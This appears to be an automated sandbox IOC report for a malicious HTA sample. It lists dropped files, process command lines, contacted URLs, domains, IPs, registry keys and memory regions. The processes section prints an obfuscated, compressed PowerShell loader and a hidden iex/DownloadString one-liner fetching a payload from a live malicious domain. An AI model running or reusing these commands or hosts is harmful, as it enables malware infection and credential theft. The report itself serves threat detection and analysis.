IOC Report
new-riii-1-b.pub.hta

loading gif

Files

File Path
Type
Category
Malicious
new-riii-1-b.pub.hta
ASCII text, with very long lines (65536), with no line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\UAGVQ199I7H3ZT4G1PSFXCX6W.exe
HTML document, Unicode text, UTF-8 text, with very long lines (986)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dfcwwmgq.gat.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gscs4evv.rkw.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hyfx1lwm.1uo.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlyzcixi.zsd.psm1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\new-riii-1-b.pub.hta"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc $ O e A 6 Z G 9 7 Z D b 7 R h i l m F 4 9 Z V 2 B n n u C v b 6 X 9 r W d 1 B 6 E b 7 m 9 x 9 y o v T d s k 7 x U K N l M 0 I X O O 5 Y f T T s f N C B B 1 U F T v Z 8 d x k R C k 2 B g b F q W J F g d 5 i Z 3 V P V 5 v C 2 D 6 Z 7 2 6 e t 3 L 3 h D B u T R E x f 9 0 f f b W r R 5 U 8 V U T U h i W P Y e y R 8 q z t S 4 R Q G J D W 2 s L i q v g l S G q I 1 5 v N K V C X y Q f S v q O n a 0 D V k b a 3 B q T 2 H s 9 0 K O u 3 X 4 G C 6 R z b u W f Y C A G X H U P M g o C s R F o y j u f w T l b v m 7 C w 3 c h Q O o s u M a t c 5 C w k Y c d Z a c J 7 g I P l W t o S k t D 9 6 e M c n X h y Z 5 y y D E r 9 j Q j q J j 8 N e 4 f x G i z N y F A E e M Z W 0 3 S Z Z g v Q Y j m r t U W L 7 k 7 Y d p 4 L l N o x 1 C 8 Q b f O Y o R v W r x S K A Z 3 i i Z r M x L d g x Y b a b G 1 j k 2 w w V j E a y N l B 4 y 3 y Y 2 e O L E D R B K W U N f d n l R N 3 E H 1 a h b W 5 P J y X L Z l Y o I s f F g C f n i 5 g k G 1 9 v q C m L E i u E L f m x s F K o 7 L i c d e 8 A 5 7 V j y S F c o l J 9 r d N O P J f V M 9 z o A Y q u t Z 6 q q D Z W r 2 t A z n J U a H a J d W Z y Y f m z J J 4 5 6 Z r g p s D s C v I w s c F A m 6 V H a T h 7 u L Z o n c l B T Y m R Q p X Y n D U C b o m V R L b t S 9 w n f V J Q N I J g m Y G p y O F O Z 6 f P E M B S 9 o g b H H r w f q S R H 6 N b a 8 f F k R g G y e v 0 x q 1 1 U O h V 4 h R 6 X 1 g 3 9 k S 7 A T Y D H h e 3 t H 6 B d r T C H c 6 N 2 a d k c u x h t e o R e 6 a f z 5 U D n b g N Q K 9 r B K 2 e u f 7 r r b X 5 z D p r 8 b T D N M Y a Z z r G 2 3 7 s n z Z N H N U s H b t x T u 0 j 1 Y I f b Z O r s 9 l J q N c y V x k i 2 T H T x B 5 Z 7 J A M w y 9 B l 5 Q c W N A k z 4 d Q b p w e h 3 w Q Z F R 0 d K G o J n   =   $ f A L s e  
 $ 5 0 s D 4 N s 3 o M 0 r P E 3 4 W J o D B 5 t x g K N d 2 p p m 8 U 3 V D 6 g n t n u U a B h R K I R 6 C Y M t m 9 c A P V y e l K D 2 I C A d 6 d 4 E s Q E E 7 A 0 z i w Y 9 k r 0 S N 4 h 1 v y x Q Y Q i G 0 S c N w Q L r N Q t P 2 S C s v t w k c E 1 i 4 P R M r G G g f y 1 3 z U f 5 d 3 f z O m M M O K Z B K K d a S 0 U X 9 V X X T 3 t c 0 O T C S J J l 8 Z t X i v S u B 4 Q 0 4 C W Q T T 5 6 A j R 2 M w W o U N Z n c J J n Y I N 8 J Q O 7 K h q 2 Z 7 7 0 c 6 N z H c j n s 5 C 4 V Q 0 a r c p 5 Z C O c K h O x y A C T E K p e U l L s Q b O F 1 V 0 B r s 6 Q o e g e Z Y o W I b V w M I J C x K O n 6 3 i N m E 6 a M n G N 0 U 7 3 O x H P F G S c m Z e y a j I l w F l W D m y 0 j F B Z h y d E s h T w z e i M 7 c 4 k e o S Z 8 u 8 u k j T u 0 v P o H S z 1 d e Y 3 U N m m b s w j i O P n j m 0 b 6 2 A 1 Y X H t R q Z 9 B N y z j P a i y 4 k 8 H g 0 Q E K 5 u e n e a M N X j 6 w w L 2 i H 3 v 3 o t m R V r x t H z e M 1 6 W r S 5 G d T N x x a r R v z g i W Y 7 c m f F c R u 1 y B 6 1 P 6 3 y H I R l E q P J F Z 3 f 9 z h w Y g G 3 b B H q 4 G j r C k n R p O k m K N 1 P V w S P g C O n p K x X L F J s I q J o T L K a s C 1 h I u N J o a h P Q a M 7 M T S t z 7 L z I Z 4 G o f P E r U u Q 8 o 2 W e R n C F 6 S G P 6 6 v m 9 N t r F s z 7 S 0 D J F q q z E q x Z w h S C K o B n i g 9 3 3 E A B Z p i Y v a 9 e w B k 8 g K X E E m T o 9 k z Y g c i F n D B d Z L n l X k L J 9 b 1 u S R G N w U t L w w 5 R d x w 3 a v Q g p B M 7 2 u i M r b Y e F N w N L P U E m h u 0 N l Z 4 k X j 5 E p 7 h 0 u d r t 1 D g L x m S b h x 4 b 5 a h 1 V k C 6 S g i 9 a 6 p i J Y H f S G H r 8 2 V O n f 5 L t f E T A i 1 V 6 1 5 j X o x O J 5 L T o N B E U 6 F S 6 r K G C a d y v b 2 z g H 4 B q s 0 K 5 X y j G w I P 0 a f h 2 L F g 1 3 0 q k E 4 4 a T e 4 B t V n C t i d f j t t 5 i P p X A 9 x g 1 a S N u 1 W S g r g 1 K V G R 8 q t 9 R X c E 9 u g j l a A 3 C h 7 P l h b W e B W x A T C I 9 k l X 4 q c F x 5 4 g U z N e k V J v w z o 3 Q u 5 X s 3 b j G O 1 b w E H d o   =   $ t R u E  
 $ K l w Z 2 v X 4 C H 9 e l k 6 V 9 o 7 Y R B L E y 7 q h N E s 1 3 3 s s R z I d o O 7 D W 1 x 4 n R S C m e 8 h e R Z f c h T 3 L k B W h 9 D K S S n e l j x i n N C o 5 m p i z r C s G n V e j s 4 h Z E 3 L P P o S O g u H K O r h I w 0 Q 9 E n q f C e y M h S u p g z u 1 3 N c 7 4 X N 9 I 5 R 5 F f V 5 Q 5 F n T 8 b R m a 5 k s 5 O 9 f f w h U M 6 9 j b A Q P Q m s J h Z z K J x f Z 5 Y Y 3 W J P P w m 4 V S 4 p P q G 2 S X t 7 M R H a p u K E X w y W 5 8 N H 6 i e 7 N D 1 y N K j E   =   $ N u L l  
 $ M j 6 k z 2 f m g z O L 6 K R 1 n G R P L R 7 6 t 0 G C 4 N b b f T Z D C 8 l s b S S 9 r U 6 o v i y M Y a y d a u z 6 0 a f b v L z Z e U J d p a a u s 7 C 1 x n Q P V l B 8 5 B I G 5 d R 6 M y c t T o W k F Z E D 2 f R U n z M d N j 7 P T E 1 5 g O 8 q M 9 f S j z g S L j C B s 0 A H E 3 W 5 m Q g G 6 G 9 J n D P D R s O 5 b y D 6 g v k Z p X Q W a r u K A m i g r M o a H b K x 5 8 u F 4 z 5 A k f 9 T O x w v E 0 z R 2 1 O u Z J J F k p j t 7 2 j E s 5 h Q K i P u r Z 5 8 h e 3 E H W U d S Z m j z U Q l c Y Q I N x f x y o a n 5 E 6 W e c j z l N r d A p P z K M o W Y z V r h J N V 8 2 R 6 f U r n G 6 9 4 j n X 4 I b s w D 4 K H u K 5 v S B n h i k l i I e W Y K x R l F 2 p Q f p T Q I 7 B a h i h a N o X i 0 h i t N D U K i B f T D t 3 P F c Y J f g h F t g x l 1 I u B b Q 3 h X u i F E x p T P w z D S 2 r p b 6 q n R l k q M N c O v P X z x t x c k y 7 f 0 L t U n n v x 4 O R W Z R v 0 x B A v 8 e 6 v K n f p J R 4 f x p g j T F R x G g 6 I 3 6 K K I 8 s H 3 r B 7 z f W 7 6 O T B V 7 Y n 3 O p 3 C J M M t m z H K b 2 2 m 8 n h w 4 f O m V c g x m X 6 e U R R f 2 p m C h s J i 7 B 5 w T h 2 n 3 p r 6 r o h J O O P 6 k 6 t N l L 8 z F T r V l i Z D u C i 1 E P O S 3 s c 3 1 m T O 0 X 5 t R p P N N W c t F D m R 0 w h Y v y K o h D L x v X d h e 3 4 T K Z y t C u x J z x a i 1 r 0 f l S q k s g q Q o q Q 1 M F L I L Q y t 4 z W T V o k M s O f B l r J n N 5 y g u 4 U v a a S E i 2 N 2 Z Q i V 0 d u y D F Q 8 3 b G 9 W A L K r c 9 S U A M g A c v w P U f T K 6 1 Y c x t s v T x g X I 5 y k y e y a I U l i a W j T A r 4 U n h X Z V C z A w x A t E x 3 t C N R Z p P t k S 0 O c m g k G I Q J 1 L n M C G k O E 3 K v h 9 x a 7 r 3 s P 3 K U y P b 2 V X r 3 d M l w m h H s E l e f 9 I Y L d b O 3 X y S c X b c D M a j a t e t w v 6 j D e K V 3 U O h z U d K W p 5 0 s I t L W q p d e d u L J N l P B H n B a Y U B 8 T K d S R u g A H P f w L A O y a j A j   = " D e f l a "   +   " t e S t r e a m " ; $ u t 0 T k Z V H b 7 B 3 7 F I x F R F R C i X B y i i s e 1 b G f R Q V y I 6 8 S g s X T h N 5 L k 0 t T q a 6 A k q n I U 0 H p v s A f Y 0 p x o B 0 p b m A V k P k B e 2 N f c v b z J R g p t R g o O q O G x u q h F i 2 v 7 I P X x L e u E i g V i u Q u S r o 7 s n P Q 9 6 S F D f w h e U T C 6 6 z Y D T H 7 z Q E 6 5 N Z R Z a i 2 G 3 f v V X v d w f c p V Z z u t 9 5 K U i D 2 H H i 0 e e 0 v 0 O b J D J 2 1 h x Q V a H q H N m W y S 2 7 K i v 3 r Y E 4 f E r U p p q a 2 b u t c q S 6 k u e F y N Z 8 T i N r m w T F v 2 i U D f t M j 5 s p y g 3 4 X f 8 j k b m z Y d 9 U 6 B g q 4 k 0 W A G r P k J N x P 6 O 1 6 o A i R R Q a k x d Q o 7 l G l k Q B E 9 F N 8 s i z N O W U T 3 t d u J H h X 5 d J k D I M T 3 Z k X f j R g 7 1 N f 1 t m k x g 2 C 2 5 m R R M A g X p l I K f 8 e v b 2 X v R L I Z F e g r j y q p E 7 p 2 t m r 5 B s U H 8 M r k d Z K N 1 t g D d C D Q X V N O C i Z 4 r Z T e U r t J x z P 8 g X t i K v D 9 G e B M C F 3 d v Y a 3 o J W S g D t T D T H G T z p b K h c j q U k I q f 3 1 J W b v U z U q S J c R u F s G Y U L N E B X J Y 2 u m t K n n Q p X 8 P 2 J o l E x F 7 r l L 5 I 4 l q B D o e S 8 c A a s J J 9 y a X F I O 2 9 P   =   " C o m p r e "   +   " s s i o n " ;   $ K Q k s q 7 X o U s W q 0 D a c U b 3 l B H o R B Z y q v g e A K P j P q I j J V Q f 3 k 3 z L Y W Z M g b 9 m m X J W 3 f f v A t i z x O e m s I 5 r i R t m 0 U d V Z j R i 9 K P 1 o y H k 4 j 0 T e w R 5 Z v W 9 M 6 M i 5 d H L x X t P h l m x Q U Z 9 q O d C V E B g b M B r j C H o u 2 4 S X N B i Y D f B f u G 9 d R P m e T W 1 8 R X y I x y W G L j W K r d J V C 6 i S r W B E m p 1 6 X 8 H f p T c 3 C d V R U m q 8 P t q a A G N M k L l e P o R v X h O e b H x D o q I s u r h c u F 4 e N J b o S M c J Y r 8 I z f f B K 3 4 y 8 E a V x g G x 0 c C A P e V L C 9 j D 8 3 e j R k 1 S A 2 G P l F o y s j y U P q p p g K s O V 0 E S b d 3 n p x 4 W C G D 9 3 L n Y s p 9 A P c c A v E t z T M D O N b z x c f J K v Q x C D j F D j e A j F 4 z 8 8 y 5 b E x   = " S t r e a "   +   " m R e a d e r " ;   . ( " i " + " e x " )   $ ( N e w - O b j e c t   I O . $ K q K S Q 7 X o u s W Q 0 d A c u b 3 l B h o r B Z Y q v g e A k P J p q I j J V Q F 3 k 3 z L y w Z m g b 9 m m X j w 3 F f V A t I Z X O E m S I 5 r I r t m 0 U D V Z j r I 9 k P 1 o Y H k 4 J 0 T E w R 5 Z v W 9 m 6 M i 5 d h L X X t P H l m x Q u z 9 q o d c v e B g B M b r j c h o u 2 4 s x N B i Y d F B F U G 9 D R P m e T W 1 8 r x Y i x Y W g L J W K R D j V C 6 I s r W B e M P 1 6 X 8 H f P T C 3 c d V r u m Q 8 p t q A A G n m k l l E p O R V x H O e b H x D O q I S u r h c u f 4 E N j B O s m c j y r 8 i z F f B K 3 4 Y 8 E A V x G g x 0 C c A P E v l C 9 J d 8 3 E j r k 1 S A 2 G P L F O y s J Y u p Q P p g k S O V 0 E s b D 3 N P x 4 w c G D 9 3 L N Y s P 9 A p c c A v E T z T M d o n B Z X C f j k V Q X c D j F D J e a j F 4 Z 8 8 Y 5 B E X   ( $ ( N e w - O b j e c t   I o . $ U T 0 T K Z V H B 7 b 3 7 F I x F R F R c I X B Y i i S E 1 B g f r Q V Y I 6 8 S g s x t H n 5 l k 0 T t q a 6 a K Q n i u 0 h p v s a f Y 0 p x o B 0 P b M a V k p K b E 2 N F c V B Z j R G p t r g O o Q O G X U Q h F I 2 v 7 I p x X L e u e I G v i U Q U s r o 7 S n P q 9 6 s F d F W H e U t C 6 6 Z Y d t h 7 Z q e 6 5 N z R z A I 2 G 3 f V V x v d w F c p V z z U T 9 5 K U i d 2 H H I 0 e e 0 v 0 O b j D J 2 1 h x Q v A h Q H n m W Y s 2 7 K i V 3 r Y e 4 F E r U P p q A 2 B U T C q s 6 K U E F Y N Z 8 T i n R m W T f v 2 i u D F t m j 5 s P y G 3 4 X f 8 J K b M Z y d 9 u 6 b G Q 4 K 0 W A g R P k j N x p 6 O 1 6 O a i R r Q a k x D q o 7 l G l k q b E 9 f n 8 s I Z n O W U t 3 T d u j H h X 5 d j K D i M T 3 Z K X F j r g 7 1 N f 1 T M k X G 2 c 2 5 M R R M a g x p L I K f 8 e V B 2 x v r L i Z F E G r j Y q p e 7 p 2 T m r 5 B s U H 8 M R K D z k n 1 T g d D c d Q x V n O c i Z 4 R Z t e U R T j x Z P 8 g X t I k v d 9 G E b m C f 3 d v y a 3 O J W S g d T t d t h g t Z P b k h c j Q u k I q f 3 1 j W b V u Z U Q S j c R U f S G y U L n e b x J y 2 u M T K N n Q P X 8 p 2 J O L e X F 7 r L L 5 i 4 L Q B d o E s 8 c A a s j j 9 Y a X f i O 2 9 P . $ m j 6 k z 2 f M g Z o L 6 k r 1 n G r P l r 7 6 t 0 g C 4 n B B F t z d c 8 L S B S S 9 r U 6 o V I y M Y a Y d a U Z 6 0 a f B v L Z Z e u J D p A A u s 7 c 1 x n q P V l B 8 5 B i G 5 d R 6 M Y C T t O W K f Z E D 2 F R u n z m d n J 7 p t e 1 5 g o 8 Q M 9 F s J Z G s L j c B S 0 A H e 3 w 5 m Q g G 6 g 9 J n d p D R s O 5 B Y D 6 G V k Z P X q W A R u K A M i G R M o A H b k X 5 8 U F 4 Z 5 A K F 9 T O x W V e 0 Z R 2 1 O u Z J J F k p J T 7 2 j e s 5 H q k i P U R Z 5 8 h e 3 e H W u d S z m j z U Q l c y q i n X f x y O A N 5 E 6 W e C j z l N r D A p p z K M o w y Z V r h J N v 8 2 R 6 f u R n G 6 9 4 j N x 4 I b s W d 4 k h u K 5 V S B n h i k l I i e W y K X R l f 2 p Q f p T Q i 7 B A H I h a n o x I 0 h I T n d U k I B f t D T 3 P F C Y J f G H f T G X L 1 i u B B q 3 H X u I f e x P T P w Z D s 2 r P B 6 q N r L k q m N c O v P x Z x t x C k Y 7 F 0 l T U N N V x 4 O R w z r V 0 X B A V 8 E 6 V k n F p J r 4 f x P g J t f r X G G 6 i 3 6 K k I 8 s h 3 R b 7 Z F W 7 6 o t b V 7 Y N 3 o P 3 C j m M t M z h K b 2 2 M 8 n H w 4 f o M v c G x M X 6 E U R R f 2 p M C h S j I 7 B 5 W t h 2 n 3 P r 6 R o h J o O P 6 K 6 T N L L 8 z f t R V l i z D U C I 1 e p o s 3 S c 3 1 m T o 0 X 5 t r P p N N W c t F d M r 0 W H y V y K O h d l X V X d H e 3 4 t k Z Y T C U x J z X a I 1 R 0 F L S q k S g Q Q O Q q 1 m f l I L q y t 4 z W T V O K M s O F b L R J N N 5 y g U 4 u V A A S e i 2 n 2 z q i V 0 D U y D f Q 8 3 B G 9 w A L K R C 9 s U A M G a C v W P U f T k 6 1 y C X t s v t X g x I 5 Y k Y E y A I u l i A w J t a r 4 U N H X z v C Z A w x a T e x 3 t c N R z p P t k s 0 O c M g k G i q J 1 l N M C G k O e 3 k v H 9 X a 7 r 3 S P 3 k U y p b 2 v x R 3 D m l w m h h s e L E f 9 i Y L d B O 3 X Y s c X b C D m a j a t e t w v 6 j D e K V 3 u o H Z U d k W P 5 0 S I t l W Q p d e d U L j n l p B H N B A y u B 8 t K D S R u G a H P F W l A O y a J a j   ( $ ( N e w - O b j e c t   I O . M e M O R y s T R E A M ( , $ ( [ C o n v e r t ] : : ( " F r o m B "   + " a s e 6 "   +   " 4 S t r i n g " ) ( " N Y + x b o M w F E V / 5 Y k l M N g k a l N V 2 S I 6 Z K j S S A w s D D H 4 E V w Z P 8 t + w e H v S 1 p 1 v H c 4 9 9 y a V W B x C d R j j J B V h 7 Y x T l O K b b 3 E h t L b 6 3 9 x o Y S h H t H a d t 7 J b e u f O T 6 z x A d m I I 7 h d p / Q 8 a e J D J l I M B q t 0 Y F A D 9 3 i 1 c o X j j y I i q Z J O Q 3 X z O A D 8 v y M S X x 1 3 9 g z r K O M k z w j y w a 7 y p q V V 8 g P S s 6 S 0 j U H 4 2 7 5 Z m T 2 8 V C W u J M D G U s z B r 4 H p 0 I w s 7 I y j u T L f f + + N y 9 z N 8 h Z D 5 u i u G a r 4 t + V m h e L c P q 1 + w E = " ) ) ) ) ,   [ i o . c O m p r E s s I o n . c o m P r E S S i O n m O D E ] : : ( " D e "   + " c o m p r e s s " ) ) ) ,   [ t E x t . E n c o D i n g ] : : A S C I I ) ) . R e a d T o E n d ( ) ; 
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
jarry-deatile.bond
malicious
https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf
172.67.194.161
malicious
immolatechallen.bond
malicious
idealizetreez.shop
malicious
pain-temper.bond
malicious
growthselec.bond
malicious
https://idealizetreez.shop/api
104.21.64.1
malicious
stripedre-lot.bond
malicious
jarry-fixxer.bond
malicious
crookedfoshe.bond
malicious
https://e1.foiloverturnarrival.shop
unknown
malicious
strivehelpeu.bond
malicious
https://idealizetreez.shop:443/api.default-release/key4.dbPK
unknown
https://github.com/mgravell/protobuf-netJ
unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
unknown
http://ocsp.sectigo.com0
unknown
http://www.smartassembly.com/webservices/Reporting/UploadReport2
unknown
https://contoso.com/License
unknown
http://www.red-gate.com/products/dotnet-development/smartassembly/?utm_source=smartassemblyui&utm_me
unknown
http://www.smartassembly.com/webservices/Reporting/
unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
unknown
http://www.smartassembly.com/webservices/UploadReportLogin/GetServerURL
unknown
https://klipgibob.shop/
unknown
https://github.com/mgravell/protobuf-neti
unknown
https://aka.ms/pscore6lB
unknown
https://stackoverflow.com/q/11564914/23354;
unknown
https://klipgibob.shop/int_clp_8888.txt
172.67.212.45
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://e1.foilovMicrosoft.PowerShell.Utility.psd1
unknown
https://developers.cloudflare.com/r2/data-access/public-buckets/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://e1.foilovM
unknown
https://idealizetreez.shop/
unknown
http://nuget.org/NuGet.exe
unknown
https://sectigo.com/CPS0
unknown
https://stackoverflow.com/q/14436606/23354
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://idealizetreez.shop:443/api
unknown
https://f1.foiloverturnarrival.shop/riiw1.mp3
172.67.194.161
https://idealizetreez.shop/&
unknown
https://klipgibob.shop/R
unknown
https://contoso.com/Icon
unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
unknown
https://github.com/mgravell/protobuf-net
unknown
https://klipgibob.shop/d
unknown
https://github.com/Pester/Pester
unknown
http://www.smartassembly.com/webservices/Reporting/UploadReport2v
unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
unknown
https://stackoverflow.com/q/2152978/23354
unknown
https://www.cloudflare.com/favicon.ico
unknown
http://www.smartassembly.com/webservices/UploadReportLogin/
unknown
https://klipgibob.shop:443/int_clp_8888.txtt
unknown
https://idealizetreez.shop/apiP
unknown
There are 45 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
e1.foiloverturnarrival.shop
172.67.194.161
malicious
idealizetreez.shop
104.21.64.1
malicious
f1.foiloverturnarrival.shop
172.67.194.161
klipgibob.shop
172.67.212.45

IPs

IP
Domain
Country
Malicious
104.21.64.1
idealizetreez.shop
United States
malicious
172.67.194.161
e1.foiloverturnarrival.shop
United States
malicious
172.67.212.45
klipgibob.shop
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
400000
remote allocation
page execute and read and write
malicious
668F000
trusted library allocation
page read and write
malicious
6898000
trusted library allocation
page read and write
malicious
6309000
heap
page read and write
4E23000
trusted library allocation
page execute and read and write
6310000
heap
page read and write
6310000
heap
page read and write
6309000
heap
page read and write
336F000
heap
page read and write
EB59000
trusted library allocation
page read and write
AD13000
heap
page read and write
6309000
heap
page read and write
AD9D000
heap
page read and write
502F000
stack
page read and write
6310000
heap
page read and write
4F6E000
stack
page read and write
6305000
heap
page read and write
8851000
heap
page read and write
6310000
heap
page read and write
51D0000
heap
page read and write
6309000
heap
page read and write
2F05000
heap
page read and write
7EF0000
trusted library allocation
page read and write
ABB3000
heap
page read and write
3334000
heap
page read and write
6303000
heap
page read and write
6302000
heap
page read and write
ABB8000
heap
page read and write
A5B7000
heap
page read and write
6309000
heap
page read and write
51A0000
heap
page read and write
6303000
heap
page read and write
6305000
heap
page read and write
AD59000
heap
page read and write
79FE000
stack
page read and write
AC71000
heap
page read and write
6310000
heap
page read and write
6310000
heap
page read and write
4D60000
trusted library allocation
page read and write
44FF000
stack
page read and write
88AE000
heap
page read and write
7B82000
trusted library allocation
page read and write
6303000
heap
page read and write
ABB6000
heap
page read and write
6310000
heap
page read and write
EE10000
trusted library allocation
page read and write
3360000
heap
page read and write
6309000
heap
page read and write
88EC000
heap
page read and write
6310000
heap
page read and write
6309000
heap
page read and write
52A5000
trusted library allocation
page execute and read and write
754F000
stack
page read and write
7A4E000
stack
page read and write
6309000
heap
page read and write
630D000
heap
page read and write
6305000
heap
page read and write
4ABE000
stack
page read and write
6309000
heap
page read and write
7B6B000
heap
page read and write
ABB4000
heap
page read and write
71F8000
trusted library allocation
page read and write
ABBB000
heap
page read and write
6302000
heap
page read and write
6310000
heap
page read and write
AC6B000
heap
page read and write
6305000
heap
page read and write
7F820000
trusted library allocation
page execute and read and write
6305000
heap
page read and write
EBB0000
trusted library section
page read and write
A70D000
heap
page read and write
352E000
stack
page read and write
6309000
heap
page read and write
6309000
heap
page read and write
6303000
heap
page read and write
AE0E000
heap
page read and write
AD55000
heap
page read and write
878E000
stack
page read and write
5030000
heap
page execute and read and write
6310000
heap
page read and write
6303000
heap
page read and write
AC57000
heap
page read and write
6305000
heap
page read and write
7D5E000
stack
page read and write
7360000
heap
page read and write
6310000
heap
page read and write
4E80000
heap
page read and write
6310000
heap
page read and write
6303000
heap
page read and write
4E24000
trusted library allocation
page read and write
6309000
heap
page read and write
6305000
heap
page read and write
78CE000
stack
page read and write
89CE000
stack
page read and write
89E0000
trusted library allocation
page read and write
6303000
heap
page read and write
6310000
heap
page read and write
630D000
heap
page read and write
7672000
heap
page read and write
8510000
trusted library allocation
page read and write
37A0000
heap
page read and write
7ED0000
trusted library allocation
page read and write
5160000
heap
page read and write
6303000
heap
page read and write
51B0000
heap
page read and write
6309000
heap
page read and write
6303000
heap
page read and write
AC68000
heap
page read and write
ABB0000
heap
page read and write
305A000
heap
page read and write
6310000
heap
page read and write
6310000
heap
page read and write
622C000
trusted library allocation
page read and write
6309000
heap
page read and write
797D000
stack
page read and write
6310000
heap
page read and write
6309000
heap
page read and write
6305000
heap
page read and write
6308000
heap
page read and write
6303000
heap
page read and write
7230000
trusted library allocation
page execute and read and write
857D000
stack
page read and write
AD22000
heap
page read and write
6310000
heap
page read and write
4DB0000
trusted library allocation
page read and write
6310000
heap
page read and write
6310000
heap
page read and write
6303000
heap
page read and write
6310000
heap
page read and write
29AC000
heap
page read and write
6308000
heap
page read and write
6309000
heap
page read and write
7590000
heap
page execute and read and write
6303000
heap
page read and write
AA60000
trusted library allocation
page execute and read and write
3300000
heap
page read and write
308D000
heap
page read and write
4E2F000
stack
page read and write
6C1E000
trusted library allocation
page read and write
6310000
heap
page read and write
6309000
heap
page read and write
6309000
heap
page read and write
AE9D000
heap
page read and write
7AF0000
trusted library allocation
page read and write
6303000
heap
page read and write
6309000
heap
page read and write
5070000
heap
page execute and read and write
7A0E000
stack
page read and write
4E10000
trusted library allocation
page read and write
4E40000
heap
page readonly
6310000
heap
page read and write
6310000
heap
page read and write
8810000
heap
page read and write
8A93000
heap
page read and write
ADF6000
heap
page read and write
6303000
heap
page read and write
6305000
heap
page read and write
6303000
heap
page read and write
6303000
heap
page read and write
4D40000
trusted library section
page read and write
6303000
heap
page read and write
6302000
heap
page read and write
7930000
trusted library allocation
page execute and read and write
7A3D000
stack
page read and write
52D0000
heap
page readonly
AC6B000
heap
page read and write
6305000
heap
page read and write
6310000
heap
page read and write
6310000
heap
page read and write
51D6000
trusted library allocation
page read and write
ABB1000
heap
page read and write
52BA000
trusted library allocation
page read and write
6305000
heap
page read and write
ADC9000
heap
page read and write
630D000
heap
page read and write
51C0000
heap
page read and write
3111000
heap
page read and write
6310000
heap
page read and write
6309000
heap
page read and write
7AC0000
trusted library allocation
page read and write
6089000
trusted library allocation
page read and write
AC64000
heap
page read and write
4F60000
trusted library allocation
page read and write
6307000
heap
page read and write
630D000
heap
page read and write
6310000
heap
page read and write
6310000
heap
page read and write
4ECC000
stack
page read and write
A9A2000
heap
page read and write
3320000
heap
page read and write
4E2D000
trusted library allocation
page execute and read and write
6303000
heap
page read and write
7E70000
trusted library allocation
page read and write
6310000
heap
page read and write
AD20000
heap
page read and write
7370000
heap
page read and write
ABC5000
heap
page read and write
6310000
heap
page read and write
6309000
heap
page read and write
6303000
heap
page read and write
AC57000
heap
page read and write
89F0000
trusted library allocation
page execute and read and write
6303000
heap
page read and write
728E000
stack
page read and write
7A70000
